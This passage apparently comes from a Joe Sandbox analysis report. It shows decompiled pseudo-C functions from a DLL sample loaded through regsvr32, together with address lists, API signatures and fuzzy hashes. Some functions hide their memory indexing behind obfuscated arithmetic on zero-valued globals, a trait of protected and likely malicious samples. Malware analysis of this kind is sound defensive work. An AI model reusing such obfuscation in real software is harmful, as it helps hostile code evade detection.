                                                                                                                								_push(_t188);
                                                                                                                								_v168 = 0x100b84e8;
                                                                                                                								L10048E48( &_v168, 0x100afe38);
                                                                                                                								asm("int3");
                                                                                                                								_push(_t228);
                                                                                                                								_t229 = _t232;
                                                                                                                								_push(_t188);
                                                                                                                								_v176 = 0x100b8580;
                                                                                                                								L10048E48( &_v176, 0x100afeec);
                                                                                                                								asm("int3");
                                                                                                                								_push(_t229);
                                                                                                                								_push(_t188);
                                                                                                                								_v184 = 0x100b8618;
                                                                                                                								L10048E48( &_v184, 0x100aff30);
                                                                                                                								asm("int3");
                                                                                                                								_push(4);
                                                                                                                								E1004764D(0x1008dd26, _t181, 0, _t222);
                                                                                                                								_t214 = E10020454(0x104);
                                                                                                                								_v196 = _t214;
                                                                                                                								_t179 = 0;
                                                                                                                								_v184 = 0;
                                                                                                                								if(_t214 != 0) {
                                                                                                                									_t179 = E1001DB72(_t214);
                                                                                                                								}
                                                                                                                								return E10047725(_t179);
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							__eax = 0x8007000e;
                                                                                                                							goto L51;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}

                                                                                                                0x100310a1
                                                                                                                0x100310a3
                                                                                                                0x100310a6
                                                                                                                0x100310a8
                                                                                                                0x100310ac
                                                                                                                0x100310af
                                                                                                                0x100310af
                                                                                                                0x100310b7
                                                                                                                0x100310ba
                                                                                                                0x100310bd
                                                                                                                0x100310c0
                                                                                                                0x100310c0
                                                                                                                0x100310c3
                                                                                                                0x100310c6
                                                                                                                0x100310c9
                                                                                                                0x100310c9
                                                                                                                0x100310ce
                                                                                                                0x100310d3
                                                                                                                0x100310d6
                                                                                                                0x100310e4
                                                                                                                0x100310e4
                                                                                                                0x100310d8
                                                                                                                0x100310db
                                                                                                                0x100310dd
                                                                                                                0x100310dd
                                                                                                                0x100310e6
                                                                                                                0x100310e9
                                                                                                                0x100310ec
                                                                                                                0x100310ef
                                                                                                                0x100310f2
                                                                                                                0x100310f5
                                                                                                                0x100310f7
                                                                                                                0x100310f9
                                                                                                                0x100310fb
                                                                                                                0x10031100
                                                                                                                0x10031100
                                                                                                                0x10031107
                                                                                                                0x1003110c
                                                                                                                0x1003110f
                                                                                                                0x10031120
                                                                                                                0x10031120
                                                                                                                0x10031111
                                                                                                                0x10031117
                                                                                                                0x10031119
                                                                                                                0x10031119
                                                                                                                0x10031122
                                                                                                                0x10031125
                                                                                                                0x10031128
                                                                                                                0x1003112a
                                                                                                                0x10031131
                                                                                                                0x10031134
                                                                                                                0x10031137
                                                                                                                0x1003113a
                                                                                                                0x1003113d
                                                                                                                0x10031140
                                                                                                                0x10031145
                                                                                                                0x10031148
                                                                                                                0x10031154
                                                                                                                0x10031158
                                                                                                                0x1003115e
                                                                                                                0x10031160
                                                                                                                0x10031162
                                                                                                                0x10031165
                                                                                                                0x1003116a
                                                                                                                0x10031174
                                                                                                                0x1003117a
                                                                                                                0x1003117f
                                                                                                                0x10031185
                                                                                                                0x1003118a
                                                                                                                0x1003118d
                                                                                                                0x1003129e
                                                                                                                0x1003129e
                                                                                                                0x100312a1
                                                                                                                0x100312a4
                                                                                                                0x100312a6
                                                                                                                0x100312a6
                                                                                                                0x100312a8
                                                                                                                0x100312aa
                                                                                                                0x100312b0
                                                                                                                0x100312b3
                                                                                                                0x100312b5
                                                                                                                0x100312b8
                                                                                                                0x100312c5
                                                                                                                0x100312c5
                                                                                                                0x100312ba
                                                                                                                0x100312be
                                                                                                                0x100312be
                                                                                                                0x100312c7
                                                                                                                0x100312ce
                                                                                                                0x100312d1
                                                                                                                0x100312d8
                                                                                                                0x100312db
                                                                                                                0x100312db
                                                                                                                0x100312a8
                                                                                                                0x100312e0
                                                                                                                0x100312e3
                                                                                                                0x100312e5
                                                                                                                0x100312e7
                                                                                                                0x100312ea
                                                                                                                0x100312f1
                                                                                                                0x100312f2
                                                                                                                0x100312f8
                                                                                                                0x100312fb
                                                                                                                0x10031303
                                                                                                                0x10031305
                                                                                                                0x10031308
                                                                                                                0x1003130a
                                                                                                                0x1003130d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10031314
                                                                                                                0x10031321
                                                                                                                0x10031328
                                                                                                                0x1003132f
                                                                                                                0x10031332
                                                                                                                0x10031335
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10031311
                                                                                                                0x10031337
                                                                                                                0x10031339
                                                                                                                0x1003133e
                                                                                                                0x10031340
                                                                                                                0x10031342
                                                                                                                0x10031348
                                                                                                                0x10031348
                                                                                                                0x1003134b
                                                                                                                0x1003134e
                                                                                                                0x1003134e
                                                                                                                0x1003134e
                                                                                                                0x10031351
                                                                                                                0x00000000
                                                                                                                0x10031300
                                                                                                                0x00000000
                                                                                                                0x10031351
                                                                                                                0x10031303
                                                                                                                0x10031353
                                                                                                                0x10031356
                                                                                                                0x10031356
                                                                                                                0x1003135c
                                                                                                                0x1003135c
                                                                                                                0x00000000
                                                                                                                0x1003116c
                                                                                                                0x1000a035
                                                                                                                0x1000a036
                                                                                                                0x1000a038
                                                                                                                0x1000a042
                                                                                                                0x1000a049
                                                                                                                0x1000a04e
                                                                                                                0x1000a04f
                                                                                                                0x1000a050
                                                                                                                0x1000a052
                                                                                                                0x1000a05c
                                                                                                                0x1000a063
                                                                                                                0x1000a068
                                                                                                                0x1000a069
                                                                                                                0x1000a06c
                                                                                                                0x1000a076
                                                                                                                0x1000a07d
                                                                                                                0x1000a082
                                                                                                                0x1000a083
                                                                                                                0x1000a08a
                                                                                                                0x1000a099
                                                                                                                0x1000a09b
                                                                                                                0x1000a09e
                                                                                                                0x1000a0a2
                                                                                                                0x1000a0a5
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0b1
                                                                                                                0x1000a0b1
                                                                                                                0x1003114a
                                                                                                                0x1003114a
                                                                                                                0x00000000
                                                                                                                0x1003114a
                                                                                                                0x10031148
                                                                                                                0x1003106f

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2459298410-0
                                                                                                                • Opcode ID: 4d3413a104903adc487147c2f6ae4262965eb4dc0bde21966797196adfeb7cfa
                                                                                                                • Instruction ID: e6cd7100d48519fc696e8c7b9946abb7a63435d6b082dadc42d981e32a129eca
                                                                                                                • Opcode Fuzzy Hash: 4d3413a104903adc487147c2f6ae4262965eb4dc0bde21966797196adfeb7cfa
                                                                                                                • Instruction Fuzzy Hash: 82C11574600609EFCB14CFA8C8849AEB7F6FF88305F24891AF916CB691DB71E945CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 71%
                                                                                                                			E10031EF2(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr* _t83;
                                                                                                                				intOrPtr* _t84;
                                                                                                                				intOrPtr _t85;
                                                                                                                				intOrPtr* _t86;
                                                                                                                				intOrPtr _t99;
                                                                                                                				intOrPtr* _t119;
                                                                                                                				intOrPtr* _t120;
                                                                                                                				intOrPtr* _t122;
                                                                                                                				intOrPtr* _t124;
                                                                                                                				intOrPtr* _t126;
                                                                                                                				intOrPtr* _t128;
                                                                                                                				intOrPtr* _t143;
                                                                                                                				intOrPtr* _t149;
                                                                                                                				intOrPtr* _t157;
                                                                                                                				intOrPtr _t158;
                                                                                                                				intOrPtr _t159;
                                                                                                                				void* _t160;
                                                                                                                				void* _t161;
                                                                                                                				intOrPtr _t163;
                                                                                                                				intOrPtr* _t164;
                                                                                                                				void* _t165;
                                                                                                                				intOrPtr _t177;
                                                                                                                
                                                                                                                				_push(0x10);
                                                                                                                				E1004764D(0x10090813, __ebx, __edi, __esi);
                                                                                                                				_t163 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t165 - 0x1c)) = __ecx;
                                                                                                                				 *((intOrPtr*)(__ecx)) = 0x1009dfec;
                                                                                                                				 *(_t165 - 4) = 0;
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
                                                                                                                					L11:
                                                                                                                					while( *((intOrPtr*)(_t163 + 0x24)) != 0) {
                                                                                                                						_t157 =  *((intOrPtr*)( *((intOrPtr*)(_t163 + 0x1c)) + 8));
                                                                                                                						__eflags = _t157;
                                                                                                                						if(_t157 == 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_t149 =  *_t157;
                                                                                                                						__eflags = _t149;
                                                                                                                						if(_t149 == 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						 *((intOrPtr*)( *_t149 + 0xbc))( *((intOrPtr*)(_t157 + 8)), 0);
                                                                                                                						 *((intOrPtr*)( *_t157 + 0x98)) = 0;
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)(_t165 - 0x18)) = _t163 + 0x18;
                                                                                                                					E100221A7(_t163 + 0x18);
                                                                                                                					if( *((intOrPtr*)(_t163 + 0x40)) == 0) {
                                                                                                                						L19:
                                                                                                                						_t83 =  *((intOrPtr*)(_t163 + 8));
                                                                                                                						if(_t83 != 0) {
                                                                                                                							 *((intOrPtr*)( *_t83 + 8))(_t83);
                                                                                                                						}
                                                                                                                						_t84 =  *((intOrPtr*)(_t163 + 0xc));
                                                                                                                						if(_t84 != 0) {
                                                                                                                							 *((intOrPtr*)( *_t84 + 8))(_t84);
                                                                                                                						}
                                                                                                                						if( *((intOrPtr*)(_t163 + 0x14)) == 0) {
                                                                                                                							L32:
                                                                                                                							_t85 =  *((intOrPtr*)(_t163 + 0x34));
                                                                                                                							if(_t85 != 0) {
                                                                                                                								__imp__CoTaskMemFree(_t85);
                                                                                                                							}
                                                                                                                							_t134 =  *((intOrPtr*)(_t163 + 0x54));
                                                                                                                							if( *((intOrPtr*)(_t163 + 0x54)) != 0) {
                                                                                                                								E100308DE(_t134,  *((intOrPtr*)( *((intOrPtr*)(_t163 + 0x50)))));
                                                                                                                								E1002C161( *((intOrPtr*)(_t163 + 0x54)));
                                                                                                                							}
                                                                                                                							_t158 =  *((intOrPtr*)(_t163 + 0x54));
                                                                                                                							_t189 = _t158;
                                                                                                                							if(_t158 != 0) {
                                                                                                                								E1002C161(_t158);
                                                                                                                								_push(_t158);
                                                                                                                								E10009F3F(0, _t158, _t163, _t189);
                                                                                                                							}
                                                                                                                							_t159 =  *((intOrPtr*)(_t163 + 0x50));
                                                                                                                							_t190 = _t159;
                                                                                                                							if(_t159 != 0) {
                                                                                                                								E10031CB5(_t159, _t190);
                                                                                                                								_push(_t159);
                                                                                                                								E10009F3F(0, _t159, _t163, _t190);
                                                                                                                							}
                                                                                                                							_t86 =  *((intOrPtr*)(_t163 + 0x4c));
                                                                                                                							if(_t86 != 0) {
                                                                                                                								_t86 =  *((intOrPtr*)( *_t86 + 8))(_t86);
                                                                                                                							}
                                                                                                                							_t164 =  *((intOrPtr*)(_t163 + 0x48));
                                                                                                                							if(_t164 != 0) {
                                                                                                                								_t86 =  *((intOrPtr*)( *_t164 + 8))(_t164);
                                                                                                                							}
                                                                                                                							 *(_t165 - 4) =  *(_t165 - 4) | 0xffffffff;
                                                                                                                							return E10047725(E100222E4(_t86, 0,  *((intOrPtr*)(_t165 - 0x18)), _t155));
                                                                                                                						} else {
                                                                                                                							 *((intOrPtr*)(_t165 - 0x10)) = 0;
                                                                                                                							if( *((intOrPtr*)(_t163 + 0x10)) <= 0) {
                                                                                                                								L31:
                                                                                                                								__imp__CoTaskMemFree( *((intOrPtr*)(_t163 + 0x14)));
                                                                                                                								goto L32;
                                                                                                                							}
                                                                                                                							_t160 = 0;
                                                                                                                							do {
                                                                                                                								_t99 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t163 + 0x14)) + _t160 + 0x24)) + 4));
                                                                                                                								 *((intOrPtr*)(_t165 - 0x14)) = _t99;
                                                                                                                								if(_t99 == 0) {
                                                                                                                									goto L28;
                                                                                                                								} else {
                                                                                                                									goto L27;
                                                                                                                								}
                                                                                                                								do {
                                                                                                                									L27:
                                                                                                                									 *((intOrPtr*)( *((intOrPtr*)(E10012115(_t165 - 0x14))) + 0x98)) = 0;
                                                                                                                								} while ( *((intOrPtr*)(_t165 - 0x14)) != 0);
                                                                                                                								L28:
                                                                                                                								E100221A7( *((intOrPtr*)( *((intOrPtr*)(_t163 + 0x14)) + _t160 + 0x24)));
                                                                                                                								_t143 =  *((intOrPtr*)( *((intOrPtr*)(_t163 + 0x14)) + _t160 + 0x24));
                                                                                                                								if(_t143 != 0) {
                                                                                                                									 *((intOrPtr*)( *_t143 + 4))(1);
                                                                                                                								}
                                                                                                                								 *((intOrPtr*)(_t165 - 0x10)) =  *((intOrPtr*)(_t165 - 0x10)) + 1;
                                                                                                                								_t160 = _t160 + 0x28;
                                                                                                                							} while ( *((intOrPtr*)(_t165 - 0x10)) <  *((intOrPtr*)(_t163 + 0x10)));
                                                                                                                							goto L31;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t161 = 0;
                                                                                                                					if( *((intOrPtr*)(_t163 + 0x38)) <= 0) {
                                                                                                                						L17:
                                                                                                                						if(_t177 != 0) {
                                                                                                                							_push( *((intOrPtr*)(_t163 + 0x3c)));
                                                                                                                							E10009F3F(0, _t161, _t163, _t177);
                                                                                                                							_push( *((intOrPtr*)(_t163 + 0x40)));
                                                                                                                							E10009F3F(0, _t161, _t163, _t177);
                                                                                                                						}
                                                                                                                						goto L19;
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)(_t165 - 0x10)) = 0;
                                                                                                                					do {
                                                                                                                						__imp__#9( *((intOrPtr*)(_t163 + 0x40)) +  *((intOrPtr*)(_t165 - 0x10)));
                                                                                                                						 *((intOrPtr*)(_t165 - 0x10)) =  *((intOrPtr*)(_t165 - 0x10)) + 0x10;
                                                                                                                						_t161 = _t161 + 1;
                                                                                                                					} while (_t161 <  *((intOrPtr*)(_t163 + 0x38)));
                                                                                                                					_t177 =  *((intOrPtr*)(_t163 + 0x38));
                                                                                                                					goto L17;
                                                                                                                				}
                                                                                                                				_t119 =  *((intOrPtr*)(__ecx + 0x50));
                                                                                                                				if(_t119 == 0) {
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				_t120 =  *_t119;
                                                                                                                				_t155 = _t165 - 0x14;
                                                                                                                				_push(_t165 - 0x14);
                                                                                                                				_push(0x100a611c);
                                                                                                                				_push(_t120);
                                                                                                                				if( *((intOrPtr*)( *_t120))() < 0) {
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				_t122 =  *((intOrPtr*)(_t165 - 0x14));
                                                                                                                				if(_t122 == 0) {
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				_t155 = _t165 - 0x10;
                                                                                                                				_push(_t165 - 0x10);
                                                                                                                				_push(0x100a628c);
                                                                                                                				 *((intOrPtr*)(_t165 - 0x10)) = 0;
                                                                                                                				_push(_t122);
                                                                                                                				if( *((intOrPtr*)( *_t122 + 0x10))() >= 0) {
                                                                                                                					_t126 =  *((intOrPtr*)(_t165 - 0x10));
                                                                                                                					if(_t126 != 0) {
                                                                                                                						 *((intOrPtr*)( *_t126 + 0x18))(_t126,  *((intOrPtr*)(__ecx + 0x58)));
                                                                                                                						_t128 =  *((intOrPtr*)(_t165 - 0x10));
                                                                                                                						 *((intOrPtr*)( *_t128 + 8))(_t128);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t124 =  *((intOrPtr*)(_t165 - 0x14));
                                                                                                                				 *((intOrPtr*)( *_t124 + 8))(_t124);
                                                                                                                				goto L11;
                                                                                                                			}

























                                                                                                                0x10032001
                                                                                                                0x10031fac
                                                                                                                0x10031fb1
                                                                                                                0x10031fd0
                                                                                                                0x10031fd0
                                                                                                                0x10031fd2
                                                                                                                0x10031fd5
                                                                                                                0x10031fda
                                                                                                                0x10031fdd
                                                                                                                0x10031fe3
                                                                                                                0x00000000
                                                                                                                0x10031fd0
                                                                                                                0x10031fb3
                                                                                                                0x10031fb6
                                                                                                                0x10031fbd
                                                                                                                0x10031fc3
                                                                                                                0x10031fc7
                                                                                                                0x10031fc8
                                                                                                                0x10031fcd
                                                                                                                0x00000000
                                                                                                                0x10031fcd
                                                                                                                0x10031f17
                                                                                                                0x10031f1c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10031f1e
                                                                                                                0x10031f22
                                                                                                                0x10031f25
                                                                                                                0x10031f26
                                                                                                                0x10031f2b
                                                                                                                0x10031f30
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10031f32
                                                                                                                0x10031f37
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10031f39
                                                                                                                0x10031f3c
                                                                                                                0x10031f3d
                                                                                                                0x10031f42
                                                                                                                0x10031f47
                                                                                                                0x10031f4d
                                                                                                                0x10031f4f
                                                                                                                0x10031f54
                                                                                                                0x10031f5c
                                                                                                                0x10031f5f
                                                                                                                0x10031f65
                                                                                                                0x10031f65
                                                                                                                0x10031f54
                                                                                                                0x10031f68
                                                                                                                0x10031f6e
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                • String ID:
                                                                                                                • API String ID: 365290523-0
                                                                                                                • Opcode ID: 046a668e55c1f63bfc0c45771c6a21394a789379807011230d761d187dd6bb23
                                                                                                                • Instruction ID: ef22d29e0bef1ac74d406dcde40b1b674f69a89cf3a88a689f20e72bee2d93af
                                                                                                                • Opcode Fuzzy Hash: 046a668e55c1f63bfc0c45771c6a21394a789379807011230d761d187dd6bb23
                                                                                                                • Instruction Fuzzy Hash: 26714675A006429FCB65DFA4C8C496AB7F2FF48305B61096CE146DB662CB31FC85CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E10006745(long _a4) {
                                                                                                                				intOrPtr _v4;
                                                                                                                				void* _t49;
                                                                                                                				signed int _t51;
                                                                                                                				signed int _t52;
                                                                                                                				signed int _t53;
                                                                                                                				signed int _t58;
                                                                                                                				signed int _t63;
                                                                                                                				signed int _t82;
                                                                                                                				signed int _t85;
                                                                                                                				intOrPtr _t101;
                                                                                                                				signed int _t117;
                                                                                                                				signed int _t131;
                                                                                                                				signed int _t135;
                                                                                                                				signed int _t136;
                                                                                                                				signed int _t138;
                                                                                                                				signed int _t139;
                                                                                                                				intOrPtr _t150;
                                                                                                                				signed int _t156;
                                                                                                                				signed int _t157;
                                                                                                                				signed int _t160;
                                                                                                                				long _t168;
                                                                                                                				signed int _t169;
                                                                                                                				void* _t170;
                                                                                                                				intOrPtr _t187;
                                                                                                                
                                                                                                                				_t170 = _a4;
                                                                                                                				_t168 = 0;
                                                                                                                				if(_t170 != 0) {
                                                                                                                					if( *((intOrPtr*)(_t170 + 0x10)) != 0) {
                                                                                                                						_t82 =  *0x100b8260; // 0x0
                                                                                                                						_t150 =  *((intOrPtr*)(_t170 + 4));
                                                                                                                						_t85 =  *0x100b8254; // 0x0
                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t170 + 0x28)) + ((_t82 *  *0x100b8258 + 1) *  *0x100b8250 - (_t82 + 2) *  *0x100b8264 - _t85 * _t85 -  *0x100b825c) * 2 + _t150))(_t150, 0, 0);
                                                                                                                					}
                                                                                                                					_t131 =  *0x100b8258; // 0x0
                                                                                                                					_t51 =  *0x100b8250; // 0x0
                                                                                                                					_t52 =  *0x100b8254; // 0x0
                                                                                                                					_t53 =  *0x100b8260; // 0x0
                                                                                                                					_t156 =  *0x100b825c; // 0x0
                                                                                                                					 *0x100bc094(((_t51 - _t131 + _t131) * _t51 + (_t52 * _t52 - 1) * _t52 + (_t156 + _t53) * _t156 - _t53 + _t53 + _t131 << 5) +  *((intOrPtr*)(_t170 + 0x30)));
                                                                                                                					if( *((intOrPtr*)(_t170 + 8)) == _t168) {
                                                                                                                						L9:
                                                                                                                						_t101 =  *((intOrPtr*)(_t170 + 4));
                                                                                                                						if(_t101 != _t168) {
                                                                                                                							_t58 =  *0x100b8258; // 0x0
                                                                                                                							_t157 =  *0x100b8250; // 0x0
                                                                                                                							_t135 =  *0x100b8264; // 0x0
                                                                                                                							_t45 = _t135 + 1; // 0x1
                                                                                                                							_t136 =  *0x100b825c; // 0x0
                                                                                                                							 *((intOrPtr*)(_t170 + 0x20))(_t101, _t168, 0x8000 + ((1 - _t58 * _t58 - _t135) * _t157 * _t157 - _t45 * _t135 + (_t136 + _t58) * 2) * 3,  *((intOrPtr*)(_t170 + 0x34)));
                                                                                                                						}
                                                                                                                						return HeapFree(GetProcessHeap(), _t168, _t170);
                                                                                                                					} else {
                                                                                                                						_t138 =  *0x100b8264; // 0x0
                                                                                                                						_t63 =  *0x100b8254; // 0x0
                                                                                                                						_t160 =  *0x100b8258; // 0x0
                                                                                                                						_a4 = _t168;
                                                                                                                						_t169 =  *0x100b8250; // 0x0
                                                                                                                						_t12 = _t63 + 1; // 0x1
                                                                                                                						_t13 = _t138 + 4; // 0x4
                                                                                                                						if((_t12 * _t169 + _t13 * _t160 -  *0x100b825c - _t138) * 5 +  *((intOrPtr*)(_t170 + 0xc)) <= 0) {
                                                                                                                							L8:
                                                                                                                							_t139 =  *0x100b8260; // 0x0
                                                                                                                							 *0x100bc094(((_t63 - _t169 - 1) * _t138 +  *0x100b825c + (_t63 * _t169 - 1) * _t160 + _t139 * 2) * 0xc +  *((intOrPtr*)(_t170 + 8)));
                                                                                                                							_t168 = 0;
                                                                                                                							goto L9;
                                                                                                                						} else {
                                                                                                                							goto L5;
                                                                                                                						}
                                                                                                                						do {
                                                                                                                							L5:
                                                                                                                							_v4 =  *((intOrPtr*)(_t170 + 8));
                                                                                                                							_t17 = _t63 + 1; // 0x1
                                                                                                                							_t117 =  *0x100b825c; // 0x0
                                                                                                                							_t187 = _v4;
                                                                                                                							if( *((intOrPtr*)(_t187 + (_a4 + (_t160 - _t17 *  *0x100b8260 - _t117 * _t117) * 4) * 4)) != 0) {
                                                                                                                								_t28 = _t160 + 2; // 0x2
                                                                                                                								 *((intOrPtr*)(_t170 + 0x2c))( *((intOrPtr*)(_t187 + (((_t138 + _t138 + 1) *  *0x100b8260 + ((_t138 -  *0x100b825c - _t63) * _t160 + _t169 - 2) * _t63 - _t28 *  *0x100b825c + _t138 + _t138 + _t160) * 3 + _a4) * 4)),  *((intOrPtr*)(_t170 + 0x34)));
                                                                                                                								_t160 =  *0x100b8258; // 0x0
                                                                                                                								_t169 =  *0x100b8250; // 0x0
                                                                                                                								_t63 =  *0x100b8254; // 0x0
                                                                                                                								_t138 =  *0x100b8264; // 0x0
                                                                                                                							}
                                                                                                                							_a4 = _a4 + 1;
                                                                                                                							_t36 = _t63 + 1; // 0x1
                                                                                                                							_t37 = _t138 + 4; // 0x4
                                                                                                                						} while (_a4 < (_t36 * _t169 + _t37 * _t160 -  *0x100b825c - _t138) * 5 +  *((intOrPtr*)(_t170 + 0xc)));
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t49;
                                                                                                                			}



























                                                                                                                0x100068c0
                                                                                                                0x100068c6
                                                                                                                0x100068ca
                                                                                                                0x100068d0
                                                                                                                0x100068e6
                                                                                                                0x00000000
                                                                                                                0x10006839
                                                                                                                0x100067f4
                                                                                                                0x10006986

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@Heap$FreeProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 834397476-0
                                                                                                                • Opcode ID: a1d15b61cb41285e90d20573a3840d593ec0e8679d45f1630e4f23d859c89062
                                                                                                                • Instruction ID: a33d3eeb4898aca3852763717d139282d52eedfb90574e918919efc758e9e97d
                                                                                                                • Opcode Fuzzy Hash: a1d15b61cb41285e90d20573a3840d593ec0e8679d45f1630e4f23d859c89062
                                                                                                                • Instruction Fuzzy Hash: 0461933A2447168FD718DFA8CEC69D5BBE9F7E83007158B3AD4458B275E770A609CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 34%
                                                                                                                			E10031B00(signed int __ecx, void* __edx) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				struct tagRECT _v40;
                                                                                                                				struct tagRECT _v56;
                                                                                                                				char _v76;
                                                                                                                				intOrPtr _v88;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				intOrPtr _t63;
                                                                                                                				signed int _t64;
                                                                                                                				intOrPtr _t70;
                                                                                                                				signed int _t72;
                                                                                                                				signed int _t73;
                                                                                                                				signed int _t75;
                                                                                                                				intOrPtr* _t77;
                                                                                                                				signed int _t78;
                                                                                                                				intOrPtr* _t80;
                                                                                                                				signed int _t81;
                                                                                                                				intOrPtr* _t82;
                                                                                                                				intOrPtr* _t84;
                                                                                                                				signed int _t86;
                                                                                                                				signed int _t88;
                                                                                                                				signed int _t92;
                                                                                                                				intOrPtr* _t99;
                                                                                                                				signed int _t100;
                                                                                                                				signed int _t126;
                                                                                                                				intOrPtr _t127;
                                                                                                                				void* _t144;
                                                                                                                				void* _t147;
                                                                                                                				intOrPtr* _t148;
                                                                                                                				signed int** _t150;
                                                                                                                				signed int* _t151;
                                                                                                                				signed int _t154;
                                                                                                                				signed int _t156;
                                                                                                                				void* _t158;
                                                                                                                				void* _t161;
                                                                                                                
                                                                                                                				_t144 = __edx;
